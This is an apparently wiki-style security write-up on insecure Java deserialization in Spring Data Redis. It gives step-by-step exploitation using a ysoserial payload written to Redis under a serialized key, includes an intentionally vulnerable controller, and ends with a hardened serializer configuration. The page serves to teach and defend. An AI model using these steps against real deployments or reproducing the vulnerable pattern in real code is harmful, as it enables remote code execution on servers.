# Spring Data Redis Insecure Deserialization

## Spring Data Redis Overview

Spring Data Redis is part of the larger Spring Data family and provides easy configuration of, and access to, Redis from Spring applications. Spring Data Redis serializes data before writing it to Redis. By default, Java native serialization is used for this.

{% embed url="https://github.com/spring-projects/spring-data-redis/blob/master/src/main/asciidoc/reference/redis.adoc#serializers" %}

## Insecure Deserialization

When Spring Data Redis retrieves data from Redis, the stored serialized bytes are deserialized. Because the target class is neither checked nor filtered during deserialization, this can lead to remote code execution.

Exploitation example:

1. Generate a payload with [ysoserial](https://github.com/frohoff/ysoserial)
2. Write the generated payload to Redis:

   ```python
   # Pick a key the application already reads from Redis, so that code execution
   # starts as soon as Spring fetches it. The bytes below are the Java-serialized
   # form of the String "rebeyond" (stream magic 0xACED, version 5, TC_STRING,
   # length 8), which is how JdkSerializationRedisSerializer stores the key.
   redis.set(b"\xac\xed\x00\x05t\x00\x08rebeyond", payload)
   ```
3. Trigger, or wait for, Spring to retrieve the data. Example of vulnerable code:

   ```java
   import java.io.Serializable;

   import org.springframework.beans.factory.annotation.Autowired;
   import org.springframework.data.redis.core.RedisTemplate;
   import org.springframework.stereotype.Controller;
   import org.springframework.web.bind.annotation.GetMapping;

   @Controller
   public class HelloController {

       // RedisTemplate with the default JdkSerializationRedisSerializer:
       // keys and values are stored as Java-serialized bytes
       @Autowired
       protected RedisTemplate<Serializable, Serializable> redisTemplate;

       @GetMapping("/")
       public String index() {
           // get() deserializes whatever bytes are stored under the key;
           // a ysoserial payload runs during readObject()
           Object result = redisTemplate.opsForValue().get("rebeyond");
           return "index";
       }
   }
   ```
4. The calculator is launched on the server:

   ![](/files/zs5KjzhPsXU1mFgRXYxc)

   The call stack is as follows:

   ![](/files/vAHu8OSlCciLbRIXIxN6)
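A mitigation for the vulnerable controller above, added here as an example (not code from the page or the Spring Data Redis project): a `RedisTemplate` configured with non-JDK serializers, so that nothing read back from Redis is ever handed to `ObjectInputStream`. The class names `RedisConfig` and `Greeting` are assumptions.

```java
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.data.redis.connection.RedisConnectionFactory;
import org.springframework.data.redis.core.RedisTemplate;
import org.springframework.data.redis.serializer.Jackson2JsonRedisSerializer;
import org.springframework.data.redis.serializer.StringRedisSerializer;

// Hypothetical value type the application caches (assumption, not from the page)
class Greeting {
    public String name;
    public String message;
}

@Configuration
public class RedisConfig {

    // Replaces the default JdkSerializationRedisSerializer for both keys and values.
    // With JSON deserialization bound to one concrete class, bytes read back from
    // Redis are parsed as JSON into Greeting and never reach Java native
    // deserialization, so a ysoserial-style payload stored under the key is a
    // parse error instead of code execution.
    @Bean
    public RedisTemplate<String, Greeting> greetingTemplate(RedisConnectionFactory cf) {
        // Bound to a concrete class; its ObjectMapper has no default typing, so
        // the stored JSON carries no attacker-controllable class names.
        Jackson2JsonRedisSerializer<Greeting> valueSerializer =
                new Jackson2JsonRedisSerializer<>(Greeting.class);

        RedisTemplate<String, Greeting> template = new RedisTemplate<>();
        template.setConnectionFactory(cf);
        // Key is stored as the plain string "rebeyond", not as 0xACED... bytes
        template.setKeySerializer(new StringRedisSerializer());
        template.setValueSerializer(valueSerializer);
        template.setHashKeySerializer(new StringRedisSerializer());
        template.setHashValueSerializer(valueSerializer);
        template.afterPropertiesSet();
        return template;
    }
}
```

Inject this bean in place of the `RedisTemplate<Serializable, Serializable>` used by the controller. Where JDK serialization cannot be removed, a JEP 290 allow-list (`jdk.serialFilter`, JDK 9+ and 8u121+) limits which classes `ObjectInputStream` will instantiate and is a useful second layer.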

## References

* [Spring Data Redis <=2.1.0 Deserialization Vulnerability](https://xz.aliyun.com/t/2339)
